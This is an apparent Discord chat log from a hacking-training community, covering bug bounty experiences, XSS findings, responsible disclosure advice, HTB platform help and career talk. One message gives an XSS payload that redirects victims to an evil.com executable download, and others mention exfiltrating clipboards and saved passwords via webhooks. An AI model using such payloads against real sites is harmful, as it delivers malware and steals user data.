#general

No British, I thought the above gave that away hahah.. we like to moan.. "making a mountain out of a mole hill"

AH makes sense. Your highest peak is a basically a hill.

Not quiite

I use that expression a lot

It means youre making something a bigger deal than it needs to be

RIght, I was thinking bunkers. The swiss have an insane amount of bunkers

guilty as charged

Many properties in my home town had little bunkers as part of them, called Anderson Shelters

They were added all over the place as common shelters to protect from bombing raids during WW2. Tiny little spaces, but yeah

Intended to have nearby shelter available in case of a raid. We had one in the garden of a place I lived in as a kid.. had an old bed and other bits left in it. Was a little creepy.

Yep, the cold war paranoia was strong

Basically some corrugated iron buried in the ground with concrete lol

These were from WW2, not the cold war

^_^ OwO

Anywaaay.. moving on

Always love seeing the mountains in Bulgaria when flying to Greece

Some good hiking there for sure.

Last time I went I got hit by hail at 2800m

Spend most of my time glued to the window just staring.. unless it's cloudy

eeesh 😐

Yeah we were 30min from the peak and had to abort

Not done much with mountains, some in Wales.. one time, our "guide" led us up the mountain.. he knew where he was going.. apparently. We were totally off track, and under our feet water was running like a river. Then we got to the peak, and he admitted he was lost.

Used my phone to find the route down 🤣

Some pretty wild places around Wales and up in Scotland. Would love to explore there tbh

what is global ranking? is that legit

👉👈

meh cant post yet. i only have 24 flag how is my global rank #952?

We did Snowdon, down through the Pen-y-Pass, over Glyder Fawr and down Glyder Fach. Was for a half marathon charity thing. I didn't walk right for a fortnight afterwards. Really nice though, if you don't go while it's pissing it down (as we did on our practice run)

hey guys

guess what the average age of a new hire is now

😄

250k context

The average age of a new hire is now 43

....

yikes

Good news I am 34

i mean it shocked me

I thought it would be 28-32

We're definitely nowhere near that

But over the whole

That's shocking

What are we ganna do lads

Where was the study done? Curious for source

Hello

Everybody wants 5 years of experience plus cyber doesnt really hit me as a newbie field.

43 is bit crazy still

The average new hire in 2025 was 42 years old, up from 40-and-a-half in 2022 and 40 in 2016, according to a recent analysis by workforce data company Revelio Labs. It’s not the only sign Revelio found that the workforce is getting older as recent grads struggle to find jobs, according to the Washington Post:
From 2022 to 2025, the share of workers 25 and under shrank from 14.9% to 8.8%.
Hiring inflows for that younger set are down more than 45% from 2019, while inflows are up almost 80% for those 65 and over during that same period.
Customer-facing roles like sales reps, real estate agents, and office assistants, in particular, are being dominated by older workers, with the average age for these positions rising by two-and-a-half years since 2015.
Revelio chief economist Lisa Simon told the Post that usually when labor markets tighten, new hires get younger as more entry-level workers join up—but that’s not what’s happening now as companies prioritize experience in the age of AI.

Where do I ask questions ? about certifications mostly and technical stuff

Just ask

lol ok

I remember some posting a while ago.. asking for more years of experience in a language, than the language had been in existence for

It was some framework

😄

Yeah wasnt that react?

AngularJS

Oh, was it a framework?

FastApi i think

Something like that anyway

It was just mega

Nowdays you have the HR shitiness + llm slop. Its a nightmare

https://x.com/tiangolo/status/1281946592459853830

oh lmfao

Fly1carus wins 😄

But.. 43

That's mental

@eternal mango how do we get a beer with u

In the 90's it was around 26

so it goes up a half year per year

Uhhhhm, conference or chance meeting?

I met someone from the platform in my local Tesco once

..but we didn't have a beer

how about a trip with g0blin badge instead

What kind of trip..

🙂

Anyway.. gonna try to get to some conferences this year

Need to get back out there

are u NA

I had found a contact form in some website I was penetesting in a BBP
the contact form had an email input field
And luckily it accepted arguments like: "<>; etc
So after sending a XSS (like test@gmail.com"><script>-----)
I had found in the response of the website that it accepted it "email: test@gmail.com"><script>-----"

Is that enough to prove this is XSS or do I need to prove it got implemented and executed ?

UK

rip

For a report, you must provide proof of impact.

How do I do that because I'm afraid I'm stuck into a blind XSS

Depends on the bounty scope and rules.

I'm sorry sir. It's what we've feared most. You'll have to test it yourself.

Some may allow you to prove such a thing with a callback for the XSS, but many would not, as it'd be touching other users.

I'm afraid we'll have to amputate.

Ruhroh

God, he was just a boy.

https://tenor.com/view/why-the-fuck-are-you-in-my-tent-ser-lyonel-baratheon-daniel-ings-a-knight-of-the-seven-kingdoms-what-are-you-doing-in-here-gif-14358564155911984359

https://giphy.com/gifs/ZMWVIXVk7Q2sw

I've seen someone on an another platform who got rewarded only because he found out that he can send the arguments lol so I was highkey excited
https://hackerone.com/reports/1037714

Idk after taking an another look I'm not sure of it now

haha

Down to you to prove your finding, and demonstrate impact. Hard to say without more context, and general probably isn't the place to share.

Can you imagine that? I've been waiting for a response from the BBP staff and when I had decided to talk about it here they finally decided to comment on my submission after 17h of waiting

Hah, it happens

We appreciate your work on this submission, however, this type of issue is specifically listed as Out of Scope. Please carefully re-read the brief:

Cross-Site Scripting (XSS) submissions with technical severity of P3 (moderate) and P4 (Low)

This type of issue has been reported before and the customer confirmed the application you have reported does not support user accounts, no data is stored, the users can not log into this webpage, there is no account or data to compromise. As such, we will be closing this submission as Not Applicable. Your efforts are appreciated and we look forward to more submissions from you!

'='

Should've read it

Unlucky 🙁

All we can do now is to work harder on the next one ig

Good luck

If you do have a valid XSS mind, look further than the app you found it on. Check policies. It's always possible to take an XSS further and impact related assets, which can then lead to a valid finding.. or at least, experience. So long as you stick to the scope, of course.

Reflected XSS even without any user accounts can have impact...

but depends on their threat model

I would've taken that if it was me triaging, though

For sure.. better to fix it, even if it is marked down as out of scope.

Why risk, weak policies, csrf

Also RCE btw, I found RCE and they said no critical info in the server (Severity: Info)

There's a whole cheatsheet somewhere for reflected XSS too, I like this one the best:

<script>window.top.location.href='https://evil.com/endpoint/file.exe';</script>

https://tenor.com/ldjbZySSzK8.gif

It's not just about alert(1)...

T h e one piece

is reallll

the real one piece is the friends we made along the way

wholesome

For this one specifically, the only thing the victim sees is basically nothing, they're on the legitimate site and suddenly get a file download request which looks like its from the same page they intended to visit

Nothing on CSRF on this blog post, but it shows what further impact an XSS could have https://g0blin.co.uk/xss-and-wordpress-the-aftermath/

had tried a webhook of mine lil bro recevied nothing but my GETs of reloading the website over and over

you can do some cool stuff tbh

with a webhook

you can exfiltrate the victim's clipboard

Btw they wanted me to privilege escalation on the server to accept it as a critical

saved passwords

etc

did you manage to do it?

or find any sensitive info?

Bruh

I ignored and told them I'm a bug hunter atp not a full penetration tester

thats wild. Who said that, the triager or the client?

First time knowing that

bugcrowd triager has tried to get me to do some scope exceeding bs before and I was just like lol no and got it escalated

Is it by stealing some type of a cookie ?

no clipboard is accessible via js functions

Yea that's what I was thinking

the client

crazy

at least them saying it doesn get feds knocking at your door lul

It would be funny to somehow XSS in a research about how bad XSS can be 😭

Is it better to get a hackthebox (CWES) or an ine (EWPTX)

Yes, that could get you in legal trouble. Even though they gave me permission to do it, I chose not to

Heheh, good luck 🙂 It's a static site

At least let us try something by leaving a search input for the blogs or smth

yeah for sure. for context I found creds on a nasa subdomain for one of their developer employees. Bugcrowd triager told me to log in with the creds lol I pointed out that the nasa scope says to stop if any PII is found and that passwords would definately count

Damn messy.. triager should've known the scope as well as, no.. better than you

yup

bugcrowd triager once told me "your POC shows the Net-NTLMv2 hash of the admin, however can you prove that you can actually login to the admin account with that"

https://tenor.com/view/fbi-agent-gif-17540199569095667102

I remember stumbling on something there a while ago, with a reminder the password was "that funny russian word" after querying some endpoint

Search would more likely be vulnerable to sqli than xss

I noped out.

It spat out a tone of private notes from accounts 🙈

and like with the context I found the creds at, it was entirely possible they werent valid. Id been perfectly okay if they just denied the report but like validation aint my job lol

And what happened after that? + LOL why would he even ask you to log in with a breached creds of an Important account (or any other account)
Are they trying to get you out of the BBP so they avoid paying for a dumb mistake ?

I got a dev password on NASA once, but was duplicated... maybe I found the culprit

hahah

but go figure once nasa actually got involved they accepted

gitlab?

lol then no

mine was on bitbucket

lul

close enough

Some say half of NASA's budget is dealing with bug reports

oh shit maybe it was bitbucket

let me double check

hahah

nothing to d

do

im so bored

:/

Remember the kid who hacked NASA because of an open port If I'm right?

Well then that some would be wrong... cos clearly their bug report triaging process isn't polished

Dont know, lots of people have hacked NASA

but entirely possible

hack NASA

This one was special cuz after that he decided to hack the freaking pentagon

federal targets arent hard tbh

Lots of people have also hacked the pentagon

nah I was right the first time, gitlab

their job isn't online security as much as national security

idk i need to do something else besides hacking rn

need a break today

so thats two times a password has been committed anyway 🤣

So it would be cooler to hack HTB or smth

Yeah

it was for a http basic auth endpoint so it was just b64 encoded lol

.. Mine was also B64 encoded...

why are you nerds here slay the spire 2 early access was released

maybe it was the same dev but on two locations lul

For a sec I thought that this was a new lab or smth you're right about the nerd point

probably

*buys game*
*cries cos I don't have enough time/ energy to play the game after work *

my game time is eaten up by mewgenics

also a good game

I don't cry anymore atp I just look at my steam library in a disappointment

umm guys https://eol.jsc.nasa.gov/SearchPhotos/photo.pl?mission=STS088&roll=724&frame=66
wtf is that

borg scout ship

the death star

https://en.wikipedia.org/wiki/Black_Knight_satellite_conspiracy_theory

Debris

Nothing to do with birds

Nope.

Its a baloon

Obviously

High altitude swamp gas

• baloon

found it

@rancid snow

nope different finding

for me the username is very clearly an employee username

more interesting if that was the case

Yeah I found them on linkedin

the password was like 7 digits and four of em were NASA

....123?

🙈

youre 1/3rd right

so either 1, or 2, or 3

thats how thirds work yeah

probably their birthday or something

321..

well

nice policy anyway

I think it makes it more egregious that bugcrowd told me what they did if theres other examples of this kind of issue too

Their triagers are not as competent as they should be lol

They marked one of my NASA reports as P5

I sent back the same report with a few bolded sentences and some emojis in the headers

they accepted it as P3

lul they marked mine as P2

unrelated but my machine name sound like a a certain exploit market name and gemini has confused this as thinking I work for them and therefore is being extra helpful

how many letters have you got from them?

just the 1 so far. I may go back at some time to hunt for a sexier issue

I wanted the letter just because someone that annoyed me was bragging about hacking nasa and Im just like pfft that doesnt mean it was hard necessarily

so spent a weekend at it even though I dont normally do bugbounties

you should see how many people submit junk reports to NASA expecting that letter and not getting it...

"Here's a public FTP listing! GIVE ME MUH LETTER!!!"

ngl, i was doing the same thing to get the Harvard letter in 2020

I do want to do the dutch t shirt thing at some point, just busy

Too bad they closed their VDP

Same, also the scope is very unclear

oh fr?

yup :(

otherwise i would've tried it by now

HEY WAIT A SEC, THEY HAVE OPENED IT UP 👀

Just rechecked and the form is open haha

https://cdn.discordapp.com/emojis/1308772568865574983.webp?size=128&animated=true

time to get harvard letter

Good luck

Found an issue already

Should've just gone to bed instead of pulling on a hunch.. now I gotta write a report. Tomorrow me problem 🤣

I think I'd been sitting on it till it opened

At least tomorrow is Saturday

guys i am so lost on how to use a VM via VPN file i cannot find machine options in this ui and every tutorial i have found is just giving me more questions, i have a vm running parrot but cant figure out the vpn file bs

openvpn the_vpn.file

alr im gonna try troubleshooting more ig

You need --config to point to the config file I think?

naw

Really?

sudo openvpn <name>.ovpn 

dracula bro

When did that change

or did I just TIL

you can use that but you don't need to

i've never used it

Fair enough 🙂

nah i legit dont know where to download the HTB specific vpn file. like i cant find an area on the site especially with this ui being different than the tuts im finding

Which platform, Labs or Academy?

yeah i have no idea where it is on the new ui

academy for me

The VPN options in Academy are shown under sections which have interaction portions now

oml disregard anything i said. i must be directionally challenged or some shid. i was in academy, needed to be in labs

Doesn't look like there's a dedicated "change VPN" on the new design

No, those are different. Labs is its own environment and the VPN file there won't work in Academy.

wth

i gotta learn the site more ig

ok thanks i found it now

If you're working on app.hackthebox.com, then hit the "Connect" button in the top right of the page to grab your VPN config file. If on Academy, when you get to a section which requires interaction, you'll be presented with an option to either download your VPN config, or start a Pwnbox (..when Pwnbox is working again)

1. Labs
2. Academy

🙂

(Pwnbox are still impacted currently though AFAIK, it's being worked on.. )

We know the reason yet?

We do, it's due to an issue with an upstream provider, like Emma said in #academy-announcements 😉

Ah hidden channel xD

It is?

Shouldn't be, just #academy-announcements

probably means muted

Yeh i mean, i didn't keep it in list

Cuz i only used labs

It was also in #labs-announcements

totally not being petty

But yeah.. I'm sure they'll have the issue resolved soon, but I can't give any timeline, sorry

I don't know that much 😅 😅

Was just curious

I don't even use pwnbox

I occasionally use it when Im too lazy to boot a VM, but booting a VM'd probably be faster...

Are there actually rewards coming besides the badges?

the 1 and 2 year streaks 🙁

I’m close to 3 years, I hope they add a badge for the 3-year streak

are you on an annual subscription?

My subscription has expired a while ago

Soon ™

bro why is browser cache giving me a server side error?

like the website was giving me 500 error code and deleting the cache solved it?

Cos browsers don't look at what it saves, it just saves it and since 500 is server sided the browser stores the response.

there iss no way i got trolled by a browser for two days

If he does a hard refresh, should it fix completely or just for the current session

Just so happens that hard refresh clears the cache for the current site

So next time he opens, it'll be the same?

No cos it clears the cache and caches the new responses

Ahhh

Ok understood

Cool

hi guys is it appropriate channel to talk about von problems ?

Can happen if the cache policy response headers are not adjusted based upon response code.. like.. for an endpoint you want to have cached client side for an hour, that behaviour can be requested in the response headers, which browsers should respect (unless you have something like Disable cache enabled in dev tools).. that counts for any response, if it's stated. So yeah.. guess your browser "correctly" cached a response, even though it gave a 500 status response.

Was this HTB? 👀

304s go brrrr

yeah the academy

It happened to me too, so I was curious

Do you recall what the request was? Curious what the cache policy is now

Upsides of employing automated vuln strategies: lots of interesting hits!
Downsides of employing automated vuln strategies: spending hours building up an exploit path and then setting up a lab to test it against only for it to not work, spend a few more hours debugging just to finally confirm that there is either no vuln or conditions required makes the exploit pointless. One down dozens more to repeat.

Lesson learned: don't automate shit

when i switched to the new UI like i switched to it then presssed continue module and it got stuck like that

Was there like an error message or anything?

So gonna assume a new caching method is what they meant by "optimized performance"

nah Im having fun lol Im just ready for bed now and stopping at a failure is better than stopping at the beginning of a new rabbit hole that will keep me awake thinking

But you can't end it on a loss...

it sswitched the ui normally but then anything else got me the costume 500 error webpage forr HTB , then i couldnt enter the website because it kept loading the error webpage

most of my evening was spent developing the automation workflow in the first place, so thats already a win in my books(esp if it does lead to some bugs this weekend).

Last question, promise.. do you recall what kinda time that started?

Wish I could dig deeper, but I don't have access, so can only pass on this info when people are up.

yesterday 12 pm UTC +1

Damn, well that doesn't line up with what I was looking at 🤣 I'll pass it on to the team anyway, see if they can see the cause.

late night guy

Yeah I fucked up.

Said earlier I wasn't gonna stay up

Guess what happened.

said bro calmly while loosing the 10th ranked match in a row in 3 am

Bold of you to assume it's only been the 10th loss

mama raised no quitter

wooo

Meanwhile me alt+f4~ing the moment the match is over

Hi all

anyone here did offshore? I just need a quick sanity check

Hey all, I just found an XSS vulnerability on a website by pure coincidence. The CWES path is already paying off, and I haven't even sat for the exam.

I do have two questions for you experienced folks:

1. How should I contact the administrators and can I get in trouble for this? I haven't gone further, I currently have two PoCs, one demonstrating HTML injection, and another one demonstrating JS injection.
2. I'd love to get a letter from them acknowledging I found this vulnerability, is it common to ask?

Thanks a lot.

Congrats!!

#1: be careful, are you in scope?
#2: for bug bounties, it should tell you where you have to submit and how to submit your report

Exactly.. if you're testing a target, you should have permission, and through permission likely contact details.

Thats the thing, this isn't even a bug bounty, I visited a website, noticed some funny parameters, tried a payload, and.. it worked.

Scope and permission. Two of the most important words.

that's tricky

You could try to reach out to the site operators, but you shouldn't really go poking about without permission, no matter how good your intent may be

Do they have a security.txt even?

nope

yeah, you probably shouldn't do that......
you need to check their possible bug bounties and see if it is in scope. If they do have a bug bounty program and your vuln is in scope, then submit
g0blin will probably know what to do if it isn't, cuz I don't

Then personally I'd warrant caution.

they would have to prove in court your criminal intention if it goes that way

Your finding may be met with gratitude, or may not

Security people are the enemy if not explicitly asked

What an interesting dilema. This website has some of my PII, would that be of any use in justifying me warning them?

It depends really

I've been in your position before. An accidental finding, in that case a financial instituion with my PII (and money). An honest accidental finding

Honestly there are two things you can do.

One would be, nothing.

It really depends on how they are, many react with emotions so they made say/do something that is not what you expect

The other would be to carefully reach out to them, perhaps via their data privacy contact. Don't just roll in going "hey you have this vuln in your website it's x y z", and by NO MEANS ask for a reward

in my case, some are silent, some do nothing, some fix the vulnerability and thank me for it, and other want to drop bombs on my house

Simply ask for their policy on reporting of potential concerns regarding site vulnerabilities

BUT.. there is risk there, if you are associated with them, e.g. have an account

The safest thing would be to do nothing, and in future abstain without permission

The best intentions are not always met with the best response

Some additional context: The reason I went poking around is that about a year ago, I noticed that these same people had a directory exposed to the internet that had all of the data of their registered users available. I found this by Googling my name, I told them, and they fixed it quite quickly.

Would finding this email and replying all with this new vulnerability be a smart thing to do? We have history and they know my intentions are good.

If you've had prior contact like that, that changes things

that's a bit different

But still, approach carefully. Ask if they have a reporting policy in place first

If they don't have one after having all of the data of their registered users available in a directory from over a year ago

...I would probably not be a customer of theirs anymore

But yeah. Tread carefully, reach out to your previous contact, see if they have a policy in place now.

Happy Friday!

Thanks a lot guys, this is the first time I have found something like this and want to be really careful. So, reach out again, and ask if they have a security policy, got it. What if they say no @eternal mango?

Then I'd ask them to remove your PII and forget it tbh

Disclaimer, I'm not a security professional, but have been part of responsible disclosure and some touchy disclosure from personal research previously

Others very well probably have better advice than I do

See what your contact says, and go from there 🙂

ask a lawyer ultimately

that's always the best bet

I just remembered I reached out to them via WhatsApp, so I don't have a way to Reply All

I will probably do this, better safe than sorry.

...

I promise I am not making this up. I just found their control panel exposed to the internet, again, and I can see the PII of people, there is even an option to delete data.

jfc just stop

names, emails, phone numbers and addresses

If you're seeing other peoples PII you've gone way past XSS

Stop prodding, speak to a lawyer.

This second discovery is not part of an exploit chain, its literally accessible via Google

One of friends got hired to the company cause he found bugs on their website

This is too common ain't it, Idk how many websites I have found that shit

If you're touching PII, you really should just step back and either obtain their policy on reporting security issues, or get actual advice from someone that doesn't have a 0 in their name

Like, an actual person in real life

😅

But yeah.. take notes fine, but moment you touch PII I'd step off

Doesn't matter if it's able to be found on Google or not, you accessed it

yeah never touch pii

@eternal mango wanna know a funny story maybe not funny, There's a company that says they work with AWS and cloud, "#Cyber experts for 5 years". And they are leaking all their database just like that don't even have to work for it, Just the API

surprise backup

you stayed up lel

Alright. I closed the website and I am going to bed. I will speak to a lawyer tomorrow and go from there. Thank you for your help everyone, I appreciate it.

us germans are slaves to GDPR

fear the datenschutz

(every company breaks gdpr constantly but they can fine you for a shit load)

yeah this must not be in EU

Yeah "speak to a lawyer tomorrow" heavily implies USA

Also howdy everyone

i mean if they foudn out he touched PII unauthorzied, even in a good intend - it can ends bad for him

100%, if I were a company and I had the means (and I were an American company and an American committed the transgression) then I'd also sue for several bajillion dollars, or however they arbitrarily do it over there

Let's move on, they got advice and are going to do the right thing.

yeah, dl it and sell it on the darkweb

for legal reasons this is a joke

Truly the safer way of doing things

In Minecraft

https://giphy.com/gifs/tophermcgee3-SaYGPKNDHlNeAAbarx

make urself some eggies

so you didn't slept

real men dont sleep mick

they type instead

It was an accident

and then regret not sleeping

those morning hours... they are so tranquil

Off work this week thankfully.

Yup.. love the silence and still

i will do some work on wekend

I designed SUCH a heavy CTF scenario

its legit too expensive to spin up just "for fun"

Brutal

AD is like... 2 heavy...

mfw im working on my honeymoon

okay im going 2 bed

GO TO SLEEP @graceful pendant FFS

Always staying up late

Hello

Despicable

https://giphy.com/gifs/chuber-hypocrisy-hypocrite-lN2gYvEifKSxG2OpIN

oh now i get the big picture

I wish HTB Academy had a light mode 😔 dark mode makes me feel like I'm reading creepypasta or something

you stayed up to tell him to go to bed

goblin did u even sleep last night

Ew

as good friends do

Light mode sucks

oh hell nahhh

sometimes i like light mode

Dark mode is best

My sleep pattern has been pretty good, almost too good recently due to reasons

This is first time I've lapsed like this in a while

so time to fuck it again

hello chat

o7

hi hades

The only times I like dark mode are in a terminal or in a text editor but that's it

https://tenor.com/view/yakuza-friday-chill-yakuza0-majima-gif-20346943

Reading docs, nah, it has to be light

No hello

Imagine reading a module for 3 hrs

imagine reading

Imagine dragons

imagine

Image

Decoy

img

i

.

..first things second https://www.youtube.com/shorts/K5jk1Fua-V4

⠀

I will try Pirate again today

i had a css file for light mode users but the new academy has changed i would have to rewrite it

kratos stop flirting on my dms bro

Ew wtf

No, I will keep doing it

not people have same eyes some have it for light mode
some even have accessibility issues

ty for verifying this, i was so damn lost because on my end because i dont have the vpn option by the pwnbox section on academy.

I love this creator 😭

Don't worry @mystic harbor, I got you https://www.youtube.com/watch?v=0gtTd4DWYs8

i see this as a noble contribution to that one user who liked and used it

LIGHT MODE EWWWWWW DISGUSTINGGGGGG

So goood

I made a claude agent framework called slavedriver

https://tenor.com/view/cat-kitty-feline-meme-funny-gif-7000720352064261872

Imagine reading a book with black pages and white text 🥀

If it was possible, I would

The, 'libabehe8svasurgreifjdfkfkffkrhdjfkfkrrkrkrkk' song.

I'm just thinking about how much it would cost in printer ink ngl

https://tenor.com/view/breaking-bad-gif-26346231

Unfortunately black paper with white ink is not economically feasable

I have some black post its

https://tenor.com/view/breaking-bad-gif-26346231

so fire

ngl

goat

https://www.youtube.com/watch?v=lRavzcSnS9U

Send to FAX, invert image

Black on white

its been 6 years since ive seen that

..no, white on black

🤣

Just don't leave it in the sun

Btw guys

My college detained me from giving exams cause I had low attendance

Yk why I had low attendance?

White theme extension

Cause I had a job

suffering from success

They straight up imprisoned you

But... aren't you working with your college?

College, which is meant to help me get a job, detains me from going to college, CAUSE I GOT A FUCKING JOB

remote is good
but not always possible

Or have I got the wrong person

No, I'm working in a different company

As a junior pentester intern

Ok, wrong person then

Sort of a job

im working for the dark side

https://giphy.com/gifs/dark-side-6x4CLjC8KofaU

Why is college so fucking stupid

Any possibility of an appeal?

why is it nighttime, but sometimes its day time

appeal of not going to it? as in only exams

that doesnt usually work in third world places

i tried

Appeal of having another chance another time

https://chromewebstore.google.com/detail/force-light-mode/mafafghcgiinbpldecfhdchfjemphkid

Oh hell yeah

I ❤️ technical debt

I tried all I could
Showed them my bug bounty cert, which I got from them.
Showed them my internship offer letter

My head of department teacher was very happy to me, and appealed on my behalf, but unfortunately my counselor teacher just doesn't like me

this is how they will react

What a fucking irony

Apparently getting internship in second year is a sin 😭😭

Well.. I guess just keep doing what you're doing, excell in your position and keep kicking arse

Tf do i do now

I feel like I can SEE again

A shame to lose out on the college degree

Get in 5th year

but experience on your cv will take you a long way

I'll still get my college degree, im not detained for the whole year 😭
Im just not allowed to give internal theory exams, thats all

cue eternal irony of no experience -> no job -> no experience

I don't have a college degree and I've worked in software for five years now

how to get experience if I have no experience

The new academy looks awesome

I don't have a college degree and

I is here

And you created HTB

But that was a long time ago

imo if you can hold the internship or turn it into a job, you're golden way more than a degree...and you can answer it in interviews to the positive.

Exactly this

Yea thats the plan

the degree is meant to get you to that point anyway

Fuck this college 😭😭

I agree

https://tenor.com/view/test-gif-2341822946696656132

just start building stuff and put it on github

Finish it if you can

but if you've got your foot in the door

Im tryna get better at AD

that's the best bet

To be fair, @eternal mango is right, if you finish the college degree you won't regret it, but you very well might regret it if you stop doing it

..but do finish it if you can

foot in door -> you make a name for yourself by showing capability -> you continue and your resume looks better every month of continuation

I regret not following through with all three of those attempts

Tell me this, is certifications enough for job? Cause I don't have a degree either and I am getting older 😭

Like, literally still have dreams about it sometimes

older than g0b and I?

But I managed somehow

In india, its hard
But in other countries, its easier

how's it going?

Bad, Im not that good

I don't know.. I want to say yes, but the hiring environment is very different from when I had to interview for a job. I will say though, lack of a degree doesn't stop someone from being hired here.

Older than where shouldve been like I would have completed college by now

Tell you what, it sucks in the UK too, all the "good" jobs are in the US

so what make someone stand out from the rest during iv?

my guy there are people who leave the military at 25-30 and get degrees...

it is a thing

US-specific though it is, I'm sure this extends the world over

also depends on if you have to pay for your degree or not

I get it that's why I am asking should I apply or not

Confidence, curiosity, humility, character and a passion for their field.

If certifications alone do it why waste money

They ain't teaching shit anyways

...I've not interviewed anyone for a while though @pseudo crater.. but that always got me by

shrug certs and degrees just state you've put time and money and possibly effort into doing related learning and work.....it's a placeholder for internships and apprenticeships since most businesses are no longer designed around teaching someone ground-up

I see,,

The reality is that careers and jobs often fill a very specific niche anyway, nobody gets a degree and uses the whole of it throughout their professional life
Arguably the entire point of college is to "prove you can persist" rather than actually teaching you

when hiring managers look at you, they look at interest and capability...that's it.

if you can do or reasonably learn what they want, they'll consider your personality fit and go on from there

if you're not a fit, they won't

mmhm, someone who can learn and fit with the team is an investment

I'd rather hire someone who has the right attitude to learn and not much knowledge than someone with a lot of knowledge and a bad attitude

Yeah, they evaluate for knowledge and fit in interviews.

Which gets more weight is up to them individually

Every technical interview I've ever had has always been super inaccurate to the actual nature of the job, which I've found really funny

I screwed up a question on my laster interview.. the answer to which was cache, my mind went blank

@eternal mango in your opinion, is college a scam?

that's designed that way for 2 reasons: 1) it could give away trade secrets and 2) it's to test how you handle unfamiliar environments

I wouldn't say it's a scam. For some it's the best way to learn, for others, it's not

The trade secrets thing isn't really a problem, I've had to sign NDAs for all of them anyway – as for the unfamiliar environments thing, I've always known roughly what they are going to ask me, so none of it has been crazy surprising

when it comes to trade secrets, I mean things like certain tools they can't make known or certain scenarios....there are things like that in cybersec in particular that are very much not stated because it leaves an opening for bad faith actors

HTB should make a college of their own

the same people applying for the jobs are the same people capable of being the other side of them 😛

Some flourish in structured / led education, others go full yolo and learn as the dice land (aka self driven learning)

like.....when you're a soc monkey, they give priority to guys who have done boxes on HTB...because it shows you're familiar with ways to get into systems

I did go to college but only 1 day 😂

lol....open registration day doesn't count

I plan to go to college/uni

wanna do some stuff there

there's too much to all of this to generalize it down to simple answers

Definitely.. any answers are a matter of perspective

I was already into cyber that time, like 1 year in and I had coding experience so I didn't focus on college so i just skipped so much that .... Dropped out

@eternal mango harvard's VDP is open now 👀

ooh

das cool

isnt HTB technically like a college?

south harmon instutute of technology

not an accredited institution so technically no
in terms of knowledge yeah, way better

when I went to university I wanted to study mathematics but the courses and lecturers were extremely poor quality, it took me years to realize this and I just blamed myself

Same here, did mathematics at university, dreadful quality of lectures

Didn't complete my degree ultimately

Why do I feel like weird not having a degree 😭

Before I didn't care

😄 I tried college 3 years in a row, each year went up to a higher level course, only thing I ever stuck around for was the circuitry and assembly sections, but could never stay for more than a month or two. Lecturers who actually cared were few and far between.. maybe 2 or 3 I met over those three years.. and most others in class just got stoned with the teachers at lunch time, which yeah.. wasn't what I was there for

Fun times, nice to meet people

But wasn't for me

I just started reading math books on my own, read them from cover to cover and had full scores on all of those courses from that point on

How does one even broach the subject of getting stoned with one's teacher 😭

I didn't like the environment

We didn't, they did.

Also we were working on a game studio

Our own company

We used to hang out at a local cemetary, and one day the teacher was there

Which failed too badly

g0thlin

And here I am broke ass

No, I was never a goth

It was just a nice place to hang out with a good view 🤣 🤣

"Because tonight will be the night that I will fall for you" being the song you were listening to at the cemetery

O.o how does one define poor quality in math?

same question to you

Haaahahah nooooo no no

Anything paranormal anytime

For me it was just the lecturers explained things in overly verbose ways, and often made mistakes while trying to demonstrate how the thing worked

Threw me off big time

lecturers didn't give a shit and didn't want to be there, course material was extremely poor

@cerulean bloom is this us bro

"I need more code advents"

The job part is so real 😂

yes

This is unironically me

😔

imagine you did a phd in math...and you were making sub-100k and teaching...would you be thrilled or questioning your life choices?

thats how I figure that to be

Yeah I mean the UK is worse, the lecturers probably make the equivalent of $50K

when you get tenure as a professor in an university I guess some just want to focus on research instead of teaching

why do people still care about these things, I thought people worked for passion

Yyyyyup.. teachers, nurses.. so important, and treated so badly

yea, most people who do those things want to work on their passion projects not teach

but they're forced by contract to divide time equally

there are better jobs to earn money than working in fang isnt it

at least, that's how I've been told about it

Doctors too, my wife is a doctor and she really does not make as much money as she ought to

and then because US system is the way it is, you have a lot of people marked PT employee as associate profs

so they have to spread across multiple schools to make a living

life in the UK is x3 as expensive as everywhere else and you earn 1/2 as much money

i wish for the day when HTB is officially a university, i will send my kids to HTB

Damn straight

enter the socialized medicine fight lol

reality is most people work for money and thats fine
if you tell passionate people they wont be paid passion will fade away but passion is a + yes but money is first
even to this date the interview process is fked they ask u stupid ass questions that dont relate to ur job in anyway
they dont do leetcode because they like it they do it because they have to

bruh is it only me that don't like the new UI..

I thought medical was the go to for job aspect

We'll get ch4p to be Dr Xavier

and you can be wolverine

idk did you try using the discord search feature to look for "new UI" to see what other people say

he actually does look like xavier tho

You would think so, but the UK also prioritises foreign workers for doctor roles over our own citizens and residents, it's bizarre

Plus our country is run by a wet noodle so that figures

it doesn't prioritize them. They're the only ones willing to work in the NHS while all the british ones fuck off to private practices for much more money

US also does this....

who's going to be magneto

seems like quite a lot of negatives on it

magneto?

then your question has been answered!

That isn't entirely true, unfortunately – it would make sense if it were true, but the reality is that virtually no doctors in the UK practise solely privately

look it like I can give you the money and keep you sustained for the rest of your life, but still is it that you feel inclined enough towards the company or towards the moto they strive for, thats the thing, if not then go somewhere else, if you want money finance is the way, look there are lots of cheap ways to make you a living like posting ai slop, and many more but the thing is are you inclined enough to that idea, otherwise its mule work.

idk about UK, but this happens in US and the problem is that they want americans to get the jobs over the foreign workers, while the problem is that its hard to find americans who can actually do those jobs lol

there should be a way to revert back or smth...

or any american workers who are competent enough to get that job but are already employed at a higher rate

i want to make money in a away that benefits people and in a way that i like

it maybe that they have doctor shortages, UK is pretty down bad as per the finance today

ch4p will possibly kill me.. but.. LOOOOL

HAHAHAHHAHAHA

PLEASE SHOW IT TO HIM

PLEASEEEE

I will 😄

@topaz fossil

AND ASK FOR HIS REACTION

NARC

why doesnt he ever come online

He's a busy man

I know many doctors personally who have missed opportunities year after year, and the jobs are usually taken by Indian workers in particular, since we have a recent agreement with India for them to send us doctors in exchange for us sending them their criminals (bizarre trade deal, but I swear it's true)

he is prolly on slack

@eternal mango can you please request him to come on discord once

pls

exactly! So its not about going out and grinding in a chopper waiting in line like a mule, its about doing what you are most satisfied in, and making a living as a side effect, otherwise its just Labour no transformation will occur in you.

for a couple of decades since new labour started the NHS privitisation train rolling (amplified 10fold by the tories aftward), the NHS has been totally dependent on foreign workers. Then the UK did brexit and made it much harder to get foreign workers, so they had to amend the working visa rules to make exceptions for medical practicioners (but it's still much harder than when there was EU free movement)

this theory only works when you have options

this for IL too.....healthcare folks are either western migrants from 1st world healthcare systems and research, Soviets from the 90s migration wave, or the Christian Arabs who grew up on the parochial education system and have a high formal education...regular folks just can't be bothered to dedicate that sort of time and effort for poor returns of socialized med

